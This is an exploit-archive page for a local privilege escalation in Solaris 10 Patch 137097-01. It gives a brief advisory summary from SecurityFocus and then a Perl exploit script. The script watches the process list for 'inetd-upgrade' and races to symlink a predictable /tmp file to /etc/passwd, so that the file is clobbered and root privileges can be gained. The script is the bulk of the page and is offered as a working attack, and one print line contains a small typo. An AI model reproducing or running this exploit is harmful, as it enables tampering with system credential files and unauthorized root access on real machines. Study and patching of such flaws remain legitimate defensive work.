[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Solaris 10 Patch 137097-01 Symlink Attack Privilege Escalation
# Published : 2012-08-11
# Author :
# Previous Title : FileBound 6.2 Privilege Escalation Vulnerability
# Next Title : Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation Vulnerability
Source: http://www.securityfocus.com/bid/54919/info
Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to gain elevated privileges on affected computers.
#!/usr/bin/perl
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";
while(<ps>) {
@args = split " ", $_;
if (/inetd-upgrade/) {
print "Symlinking iconf_entries.$args[1] to $clobbern";
symlink($clobber,"/tmp/iconf_entries.$args[1]");
exit(1);
}
}
}